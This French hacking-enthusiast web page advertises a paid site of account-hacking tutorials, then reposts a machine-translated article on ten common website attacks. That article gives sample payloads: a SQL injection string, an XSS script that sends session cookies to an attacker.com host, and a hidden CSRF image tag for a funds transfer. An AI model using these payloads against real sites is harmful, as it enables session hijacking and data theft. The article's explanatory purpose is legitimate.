Sélectionner une page

N°1 Kali Linux

HACK THE PLANET

Je me nomme Numerius,

Et je suis un passionné de Linux

Bonjour à tous,

Pour commencer je vais me présenter.

Je suis Numerius et je suis un passionné de linux.

J’ai le plaisir de vous présenter mon Site Web :

< Les linux des Hackers >

C’est un Site Web sur la sécurité informatique et vous pourrez apprendre toutes les basses de l’Hacking.

Que vous soyez débutant ou un expert vous en êtes les bienvenues, car j’ai comme passion l’informatique, la création de Site Web, le Hacking et je serais ravi de partager mes passions avec vous.

Sur ce Site Web vous trouverez tous ce qu’il vous faut pour naviguer sur Internet, j’ai créé des pages où j’ai rassemblé le maximum de lien et de moteurs de recherches du monde que vous pourrez utiliser pour effectuer vos recherches Web.

Vous s’aurez également comment installer et utiliser Windows 11, Kali linux, Parrot Security, BlackArch linux et divers Scripte de Hacking pour linux et Windows.

Vous s’aurez également comment router votre Android afin de pouvoir installer Kali Nethunter et Andrax afin de pouvoir faire du Hacking avec votre téléphone où votre tablette.

Je vous ai également partager des tas de Tutos sur comment Hacker une Wifi, un PC, Un téléphone, un Site Web, un compte Gmail, un compte Facebook et un compte Instagram.

Et vous trouverez également des tas d’autres choses que je vous laisserais découvrir par vous-même afin de vous réserver des surprises en vous inscrivants à mon Site Web qui j’espère vous plairas.

Et sachez que je vous invite à venir me rejoindre sur mon groupe Facebook sur les Hacker Blanc en Français que vous trouverez à l’adresse dans le texte ci-dessous :

https://www.facebook.com/groups/hackerblancfrancophone

Et si vous n’avez pas Facebook je vous présente une alternative qui j’espère vous intéresseras, c’est un Réseau social privé spécialisé sur le Hacking, le Web et le Dark Web,

Dessus nous pourrons faire connaissance, créer des pages, des groupes, des blogs et échanger des messages, des photos, des vidéos, des musiques, des scripts de Hacking et des documents afin de partager le maximum de chose sur notre passion qui est internet et le Hacking.

Alors sans attendre et sans hésitation venez me rejoindre à l’adresse dans le texte ci-dessous :

https://world-hackers.com

Nous pourrions tous nous donner rendez-vous toutes les nuits du samedi au dimanche à 01h00 du matin afin de ce retrouvé, afin de discuter et faire connaissances.

Le Site Web les Linux des Hackers est passé de Gratuit à payant car vu les factures qui arrive je n’ai pas eu d’autres choix.

Pour la modique sommes de 5 Euros vous aurez un accès complet au Site Web pendant 1 Année et sachez que vous ne serez pas déçus.

Car Malheureusement j’avais mis un bouton de Don et que pas un seul de mes visiteurs n’a pensé à moi et mon envie d’aller boire un petit café.

Vous pourrez payer en passant par les passerelles sécurisées de payements, alors n’hésitez pas à vous inscrire car je vous le dis vous ne serez pas déçu et vous trouverez tous ce que vous devez savoir sur le Hacking.

Et pour les fauchés comme moi je vous propose d’essayer l’abonnement pour 1 Mois Gratuitement afin de vous faire une idée du Site Web et de ce qu’il pourrait vous offrir.

Alors sans vous en dire plus je vais vous laissez vous inscrire afin de découvrir mon Site Web et sachez que je souhaite que cela vous soie passionnant et enrichissant.

A tous je vous souhaite une bonne journée et à samedi à 01h00 du matin sur mon réseau social Privé spécial Hacker.

C’était Numerius…

C’est quoi un Hacker !!!

Top 10 Linux de Pentesting

Top 10 des Applications Android de Pentesting

Les Hackers les plus recherchés du Monde

La découverte de Malware

L’utilisation de Malwares sur Windows

L’utilisation de Malwares sur Kali Linux

10 Façons les plus populaires pour les Hackers de pirater votre Site Web

 

Quiz pop: qu’est-ce que Microsoft, Twitter, Facebook, NBC, ZenDesk et Drupal ont en commun?

Ils ont tous été récemment piratés.

Oui, le piratage est une menace croissante pour toutes les entreprises, grandes et petites.

Qu’il s’agisse de voler des données privées, de prendre le contrôle de votre ordinateur ou de fermer votre site Web, les pirates peuvent avoir un impact sérieux sur n’importe quelle entreprise, à tout moment. Nous avons mené une analyse en toute sécurité depuis son existence sur différents vecteurs d’attaque possibles et, par conséquent, il a été prouvé avec un record de sécurité des applications Web en Inde et est actuellement en train de se mondialiser. Il y a des détails sur lesquels Defencely avait travaillé pour se faire un nom sur le portefeuille CIO pour son immense succès avec la sécurité des technologies de l’information en tant que fournisseur de services. À un grand étonnement, Defencely a non seulement résisté à son client dans le passé, mais maintenant il a fourni des recherches révolutionnaires pour tous ses clients avec des livrables spéciaux, les services de Defencely ayant été optés. Mais il y a un côté quiDefencely a choisi d’opter pour l’amélioration du monde du Web, et c’est le HACKING ÉTHIQUE WHITE HATEqui fait son chemin dans le monde des affaires et fournit des services de sécurité approfondis pour une protection globale de la sécurité Web à ses précieux clients. En dehors de chacun des services fournis par Defencely, il a maintenu un standard sage sur la chasse aux bogues et donc une excellence éprouvée pour ses livrables de qualité que les experts de la sécurité de l’équipe rouge. L’équipe rouge a pris la responsabilité de représenter Defencely dans diverses gratitudes, que ce soit pour la diffusion des problèmes de sécurité de l’information, la participation à des conférences sur la sécurité de l’information pour fournir gratuitement des tests industriels de pénétration pour une approche initiale et cela seul avait abouti à une déduction sage de la façon dont la sécurité pourrait simplement être une illusion pour le monde des affaires et comment les entreprises pourraient être ruinées pendant la nuit.

Les pirates peuvent attaquer de nombreuses façons, mais voici les dix façons les plus courantes de menacer la sécurité de votre site et de votre entreprise:

10. ATTAQUES PAR INJECTION

Les attaques par injection se produisent lorsqu’il y a des failles dans votre base de données SQL, vos bibliothèques SQL ou même le système d’exploitation lui-même. Les employés ouvrent des fichiers apparemment crédibles avec des commandes cachées, ou «injections», sans le savoir.

Ce faisant, ils ont permis aux pirates d’obtenir un accès non autorisé à des données privées telles que les numéros de sécurité sociale, le numéro de carte de crédit ou d’autres données financières.

EXEMPLE D’ATTAQUE PAR INJECTION TECHNIQUE:

Une attaque par injection pourrait avoir cette ligne de commande:

Requête de chaîne = « SELECT * FROM comptes WHERE custID = ‘ » + request.getParameter (« id ») + « ‘ »;

Le pirate modifie le paramètre ‘id’ dans son navigateur pour envoyer: ‘ou’ 1 ‘=’ 1. Cela modifie la signification de la requête pour renvoyer tous les enregistrements de la base de données des comptes au pirate, au lieu des seuls clients visés.

9. ATTAQUES DE SCRIPT INTERSITE

Le Cross Site Scripting, également connu sous le nom d’attaque XSS, se produit lorsqu’une application, une URL «get request» ou un paquet de fichiers est envoyé à la fenêtre du navigateur Web et contourne le processus de validation. Une fois qu’un script XSS est déclenché, sa propriété trompeuse fait croire aux utilisateurs que la page compromise d’un site Web spécifique est légitime.

Par exemple, si www.example.com/abcd.html contient un script XSS, l’utilisateur peut voir une fenêtre contextuelle demandant ses informations de carte de crédit et d’autres informations sensibles.

EXEMPLE DE SCRIPT TECHNIQUE INTERSITE:

Un exemple plus technique:

(Chaîne) page + = “<nom d’entrée = ‘creditcard’ type = ‘TEXT’ value = ‘” + request.getParameter (“CC”) + “’>”;

L’attaquant modifie le paramètre ‘CC’ de son navigateur pour:

‘> <script> document.location =’ http: //www.attacker.com/cgi-bin/cookie.cgi? foo = ‘+ document.cookie </script>’

Cela provoque l’envoi de l’ID de session de l’utilisateur sur le site Web de l’attaquant, permettant au pirate de pirater la session actuelle de l’utilisateur. Cela signifie que le pirate a accès aux informations d’identification de l’administrateur du site Web et peut en prendre le contrôle complet. En d’autres termes, piratez-le.

8. ATTAQUES D’AUTHENTIFICATION ET DE GESTION DE SESSION BRISÉES

Si le système d’authentification des utilisateurs de votre site Web est faible, les pirates peuvent en profiter pleinement.

Les systèmes d’authentification impliquent des mots de passe, la gestion des clés, des identifiants de session et des cookies qui peuvent permettre à un pirate d’accéder à votre compte depuis n’importe quel ordinateur (tant qu’ils sont valides).

Si un pirate exploite le système d’authentification et de gestion de session, il peut assumer l’identité de l’utilisateur.

Effrayant en effet.

Posez-vous ces questions pour savoir si votre site Web est vulnérable à une attaque d’authentification et de gestion de session rompue:

  • Les informations d’identification de l’utilisateur sont-elles faibles (par exemple stockées à l’aide du hachage ou du chiffrement)?

  • Les informations d’identification peuvent-elles être devinées ou remplacées par des fonctions de gestion de compte faibles (par exemple, création de compte, changement de mot de passe, récupération de mot de passe, ID de session faibles)?

  • Les ID de session sont-ils exposés dans l’URL (par exemple, réécriture d’URL)?

  • Les ID de session sont-ils vulnérables aux attaques de fixation de session?

  • Les ID de session expirent-ils et les utilisateurs peuvent-ils se déconnecter?

Si vous avez répondu «oui» à l’une de ces questions, votre site pourrait être vulnérable à un pirate.

7. CLICKJACKING ATTACKS

Le détournement de clics, également appelé attaque de réparation d’interface utilisateur, est lorsqu’un pirate utilise plusieurs couches opaques pour inciter un utilisateur à cliquer sur la couche supérieure sans qu’il le sache.

Ainsi, l’attaquant «détourne» les clics qui ne sont pas destinés à la page réelle, mais à une page où l’attaquant veut que vous soyez.

Par exemple, en utilisant une combinaison soigneusement conçue de feuilles de style, de cadres iFrame et de zones de texte, un utilisateur peut être amené à croire qu’il tape le mot de passe de son compte bancaire, mais qu’il tape en fait dans un cadre invisible contrôlé par l’attaquant.

EXEMPLE DE DÉTOURNEMENT DE CLICS:

Voici un exemple en direct, mais sûr, du fonctionnement du détournement de clics:

http://attacker.kotowicz.net/alphabet-hero/game.html

Et voici une vidéo qui montre comment nous avons aidé Twitter à se défendre contre une attaque Clickjacking:

6. EMPOISONNEMENT DU CACHE DNS

L’empoisonnement du cache DNS implique d’anciennes données de cache que vous pensez peut-être ne plus avoir sur votre ordinateur, mais qui sont en fait «toxiques».

Également connu sous le nom de DNS Spoofing, les pirates peuvent identifier les vulnérabilités dans un système de nom de domaine, ce qui leur permet de détourner le trafic de serveurs légitimes vers un faux site Web et / ou serveur.

Cette forme d’attaque peut se propager et se répliquer d’un serveur DNS à un autre DNS, «empoisonnant» tout ce qui se trouve sur son chemin.

En fait, en 2010, une attaque d’empoisonnement DNS a complètement compromis le Great Firewall of China (GFC) temporairement et censuré certains contenus aux États-Unis jusqu’à ce que le problème soit résolu.

5. ATTAQUES D’INGÉNIERIE SOCIALE

Une attaque d’ingénierie sociale n’est pas techniquement un «hack».

Cela se produit lorsque vous divulguez des informations privées de bonne foi, comme un numéro de carte de crédit, via des interactions en ligne courantes telles que le courrier électronique, le chat, les sites de médias sociaux ou pratiquement n’importe quel site Web.

Le problème, bien sûr, est que vous n’entrez pas dans ce que vous pensez entrer.

Un exemple classique d’une attaque d’ingénierie sociale est l’arnaque «Microsoft tech support».

C’est quand quelqu’un d’un centre d’appels prétend être un membre du support technique MS qui dit que votre ordinateur est lent et / ou infecté, et peut être facilement réparé – à un coût, bien sûr.

Voici un article de Wired.com sur la façon dont un expert en sécurité a joué avec ce que l’on appelle le support technique Microsoft.

4. SYMLINKING – UNE ATTAQUE D’INITIÉ

Un lien symbolique est essentiellement un fichier spécial qui «pointe vers» un lien dur sur un système de fichiers monté. Une attaque de lien symbolique se produit lorsqu’un pirate informatique positionne le lien symbolique de telle manière que l’utilisateur ou l’application qui accède au point de terminaison pense qu’il accède au bon fichier alors qu’il ne l’est vraiment pas.

Si le fichier de point de terminaison est une sortie, la conséquence de l’attaque de lien symbolique est qu’il pourrait être modifié à la place du fichier à l’emplacement prévu. Les modifications apportées au fichier de point de terminaison peuvent inclure l’ajout, l’écrasement, la corruption ou même la modification des autorisations.

Dans différentes variantes d’une attaque par lien symbolique, un pirate peut être en mesure de contrôler les modifications apportées à un fichier, de s’accorder un accès avancé, d’insérer de fausses informations, d’exposer des informations sensibles ou de corrompre ou de détruire des fichiers système ou d’application vitaux.

3. ATTAQUES DE CONTREFAÇON DE DEMANDE INTERSITE

Une attaque de contrefaçon entre sites se produit lorsqu’un utilisateur est connecté à une session (ou un compte) et qu’un pirate utilise cette opportunité pour lui envoyer une fausse demande HTTP pour collecter ses informations de cookie.

Dans la plupart des cas, le cookie reste valide tant que l’utilisateur ou l’attaquant reste connecté au compte. C’est pourquoi les sites Web vous demandent de vous déconnecter de votre compte lorsque vous avez terminé – cela expirera la session immédiatement.

Dans d’autres cas, une fois que la session de navigation de l’utilisateur est compromise, le pirate peut générer des demandes à l’application qui ne pourront pas faire la différence entre un utilisateur valide et un pirate.

EXEMPLES D’ATTAQUES INTERSITES

Voici un exemple:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src = ”<span style =” color: red; ”> http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct# </span>” width = ”0 ″ height =” 0 ″ / >

Dans ce cas, le pirate crée une demande qui transférera de l’argent du compte d’un utilisateur, puis intègre cette attaque dans une demande d’image ou une iframe stockée sur divers sites sous le contrôle de l’attaquant.

2. ATTAQUES D’EXÉCUTION DE CODE À DISTANCE

Une attaque d’exécution de code à distance est le résultat de faiblesses de sécurité côté serveur ou côté client.

Les composants vulnérables peuvent inclure des bibliothèques, des répertoires distants sur un serveur qui n’ont pas été surveillés, des infrastructures et d’autres modules logiciels qui s’exécutent sur la base d’un accès utilisateur authentifié. Les applications qui utilisent ces composants sont toujours attaquées par le biais de scripts, de logiciels malveillants et de petites lignes de commande qui extraient des informations.

Les composants vulnérables suivants ont été téléchargés 22 millions de fois en 2011:

Contournement d’authentification Apache CXF ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 )

En omettant de fournir un jeton d’identité, les attaquants pourraient invoquer n’importe quel service Web avec une autorisation complète.

1. ATTAQUE DDOS – ATTAQUE PAR DÉNI DE SERVICE DISTRIBUÉ

DDoS, ou déni de services distribué, est l’endroit où les services d’un serveur ou d’une machine sont rendus indisponibles pour ses utilisateurs.

Et lorsque le système est hors ligne, le pirate informatique compromet tout le site Web ou une fonction spécifique d’un site Web à son propre avantage.

C’est un peu comme se faire voler sa voiture quand on a vraiment besoin d’aller vite.

Le programme habituel d’une campagne DDoS est d’interrompre temporairement ou de supprimer complètement un système fonctionnant avec succès.

L’exemple le plus courant d’une attaque DDoS pourrait être l’envoi de tonnes de demandes d’URL vers un site Web ou une page Web en très peu de temps. Cela provoque un goulot d’étranglement côté serveur car le processeur vient de manquer de ressources.

Les attaques par déni de service sont considérées comme des violations de la politique d’utilisation appropriée d’Internet du Conseil d’architecture Internet et violent également les politiques d’utilisation acceptable de pratiquement tous les fournisseurs de services Internet.

[maxbutton id = « 1 ″]

Écrit par Shritam Bhowmick sur14 juin 2013

HACK THE PLANET

Les Linux des Hackers

Abonnez-vous en m’offrant un petit café !!!

Bonjour à tous ;

Je vous souhaite la bienvenue sur mon Site Web les Linux des Hackers.

Si vous êtes arrivé sur cette page est que vous voulez visiter mon Site Web et que vous voulez en savoir plus sur l’hacking.

Le site Web est passé de Gratuit à payant car malheureusement de mon côté j’ai des factures qui arrivent et que je ne suis pas très riche.

J’avais mis un bouton de Don mais je n’ai jamais rien reçu de la part de mes visiteurs alors j’ai décidé de rendre payant mon Site Web.

Je ne vous demande pas grand-chose et je ne vous demanderais juste que de quoi aller boire un petit café afin que vous puissiez avoir un accès complet au Site Web.

Pour la modique somme de 5 Euros vous aurez un accès complet au Site Web pour la durée de 6 mois.

Vous aurez le choix de choisir la passerelle sécurisée de Stripe et de Paypal afin de payer ses quelques Euros afin que je puisse me payer mon petit café.

Alors n’hésitez plus et inscrivez-vous…

You have Successfully Subscribed!

Pin It on Pinterest